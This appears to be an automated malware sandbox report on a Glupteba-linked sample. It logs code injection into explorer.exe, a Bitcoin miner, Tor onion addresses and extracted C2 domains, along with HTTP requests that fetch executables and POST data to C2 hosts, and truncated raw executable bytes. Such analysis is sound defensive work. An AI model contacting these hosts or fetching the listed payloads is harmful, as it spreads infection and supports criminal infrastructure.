Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp	String decryptor: NmLpQW--spam2

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_005CC700 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,

8_2_005CC700

Source: 2788.exe, 00000006.00000003.3730488975.00000000030FB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_70195060-7

Bitcoin Miner

Yara detected Glupteba

Source: Yara match	File source: 33.2.6F54.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6F54.exe.2e70e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.6F54.exe.3760000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.6F54.exe.37a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.6F54.exe.3840000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\6F54.exe

Unpacked PE file: 33.2.6F54.exe.400000.5.unpack

Source: HVqTxn73uD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 51.15.246.170:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.49:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.149:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.191.95:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.13.164.118:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.114.209:443 -> 192.168.2.5:49758 version: TLS 1.2

Source:	Binary string: EfiGuardDxe.pdb7 source: 6F54.exe
Source:	Binary string: C:\A\18\s\PCbuild\amd64\select.pdb source: 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_tkinter.pdb source: 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BC:\foyed.pdb source: HVqTxn73uD.exe, 00000000.00000002.2032290022.0000000000427000.00000002.00000001.01000000.00000003.sdmp, HVqTxn73uD.exe, 00000000.00000000.1968103473.0000000000427000.00000002.00000001.01000000.00000003.sdmp, sfriduf, 00000004.00000000.2220483209.0000000000427000.00000002.00000001.01000000.00000005.sdmp, sfriduf, 00000004.00000002.2274696805.0000000000427000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: 3EBB.exe, 00000007.00000003.2355092272.000001D435ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_bz2.pdb source: 3EBB.exe, 00000007.00000003.2355313569.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_hashlib.pdb source: 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: 6F54.exe
Source:	Binary string: C:\foyed.pdb source: HVqTxn73uD.exe, 00000000.00000002.2032290022.0000000000427000.00000002.00000001.01000000.00000003.sdmp, HVqTxn73uD.exe, 00000000.00000000.1968103473.0000000000427000.00000002.00000001.01000000.00000003.sdmp, sfriduf, 00000004.00000000.2220483209.0000000000427000.00000002.00000001.01000000.00000005.sdmp, sfriduf, 00000004.00000002.2274696805.0000000000427000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: 3EBB.exe, 00000007.00000003.2355092272.000001D435ACC000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E6CD1 _free,_free,FindFirstFileExW,		8_2_005E6CD1
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E6D85 FindFirstFileExW,FindNextFileW,FindClose,		8_2_005E6D85

Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI56002\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI56002\tcl\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.5:49711
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.5:49712
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.5:49713

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.215.49 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query:
Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: everystep-org.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.88.149 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.171.233.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.168.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.17 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.86.30.3 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: dayfarrichjwclik.fun
Source: Malware configuration extractor	URLs: neighborhoodfeelsa.fun
Source: Malware configuration extractor	URLs: ratefacilityframw.fun
Source: Malware configuration extractor	URLs: reviveincapablewew.pw
Source: Malware configuration extractor	URLs: cakecoldsplurgrewe.pw
Source: Malware configuration extractor	URLs: opposesicknessopw.pw
Source: Malware configuration extractor	URLs: politefrightenpowoa.pw
Source: Malware configuration extractor	URLs: http://snukerukeutit.org/
Source: Malware configuration extractor	URLs: http://lightseinsteniki.org/
Source: Malware configuration extractor	URLs: http://tyiuiunuewqy.org/
Source: Malware configuration extractor	URLs: http://liuliuoumumy.org/
Source: Malware configuration extractor	URLs: http://tonimiuyaytre.org/

Found Tor onion address

Source: 6F54.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: 6F54.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
Source: 6F54.exe, 00000021.00000002.2594000287.000000000C1E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps

Queries the IP of a very long domain name

Source: unknown	DNS traffic detected: query: nfypdq4g2m33vweraptamw5ggedf2yv3ut7orxzwfciiacnx466a.mx-verification.google.com
Source: unknown	DNS traffic detected: query: nfypdq4g2m33vweraptamw5ggedf2yv3ut7orxzwfciiacnx466a.mx-verification.google.com

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: kayakikaku.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lwnlinub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yayy.com.vn replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.djdavitorres.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sethbuckley.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: alonso143.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: coryrobertsphoto.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: delmontealw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nfypdq4g2m33vweraptamw5ggedf2yv3ut7orxzwfciiacnx466a.mx-verification.google.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.schwarzvenus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chorvatsko-dalmacie.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dayfarrichjwclik.fun replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.alonso143.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chesters.net.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wbs.bc.net.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: escortinlinea.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: djdavitorres.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: onualituyrs.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dearjohnweb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fakey.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bwhorsebrokers.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dm.famm.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: twisted-media.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: inter-trend.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: firstheritagecapital.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ezhostplace.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fullwarezim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rqkusdpl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.fullwarezim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vividtechnologies.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rhroen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: airpacific.comfj replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.wbs.bc.net.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mobile.baihe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xbzefbkj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jcacademy.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: eyltia.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cewtwi.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ieurtoie.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: overaz.comco replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.eyltia.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yecomm.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: perfectscents5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.fullwarezim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.1stoptionmortgage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.overaz.comco replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: anti-luck.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.perfectscents5.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: metallica-fan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.twisted-media.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.rhroen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fyfuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.fakey.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: schwarzvenus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 9d783df7146adacc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.ezhostplace.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 1stoptionmortgage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.laschool.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: keenmanor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: atomicrax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.vividtechnologies.com.au replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lwwres.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mymts.com.ca replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: laschool.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.leadgenerationlegacy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leadgenerationlegacy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cpshrm.com replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 216

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic	TCP traffic: 192.168.2.5:49719 -> 188.213.49.109:9001
Source: global traffic	TCP traffic: 192.168.2.5:49723 -> 167.114.144.152:9002
Source: global traffic	TCP traffic: 192.168.2.5:49756 -> 5.9.43.211:9001
Source: global traffic	TCP traffic: 192.168.2.5:49759 -> 15.204.234.61:9300
Source: global traffic	TCP traffic: 192.168.2.5:49762 -> 144.172.118.5:9001

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Fri, 22 Dec 2023 03:57:32 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=3e6c2ca3.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bb c5 5a 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 52 02 00 00 76 43 00 00 00 00 00 9c 3e 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 45 00 00 04 00 00 ff 47 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 9c 02 00 50 00 00 00 00 c0 44 00 70 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 71 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a2 50 02 00 00 10 00 00 00 52 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1e 35 00 00 00 70 02 00 00 36 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 07 42 00 00 b0 02 00 00 18 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 f2 00 00 00 c0 44 00 00 f4 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 03:57:41 GMTContent-Type: application/octet-streamContent-Length: 7069897Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=tuc5.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W6GiskSNbQ2Mbg248iad7RGLEkY3cAZj64J4SSG9Ro9PRCK%2FVRV1nthR5TCNvCK%2B7aEA7whDfW6yGaiakgMXmbDFx%2BHbcdmA15d%2BFoR5hs8d5fAMDmluYRM2alhU%2F0itKDZFHM1t"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8395712e7df27469-MIAalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 35 09 85 65 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL5eF@@@@P,CODEd

Source: Joe Sandbox View	IP Address: 172.67.215.49 172.67.215.49
Source: Joe Sandbox View	IP Address: 171.25.193.9 171.25.193.9
Source: Joe Sandbox View	IP Address: 171.25.193.9 171.25.193.9

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 83d60721ecc423892660e275acc4dffd

Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shpilliwilli.com
Source: global traffic	HTTP traffic detected: GET /dad9b3a52c30c4733cf934e71716b3dc/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: linkofstrumble.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aqkqgwqwxgrwmfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: sumagulituyo.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://puuyfivujad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: snukerukeutit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fuimjhrqlldh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: lightseinsteniki.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aldquwpfyut.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: liuliuoumumy.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjcmsrkqaxwfujm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://muaujavwjqxpv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://biffwjjcoggy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kpfgrytbsvr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bfjrcjftafcnt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikuilbipcuruyur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mywuaatxkdht.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nxlpslynvrwoh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bombertublestylebanws.fun
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ltklpqvpltfmowcg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: stualialuyastrelia.net
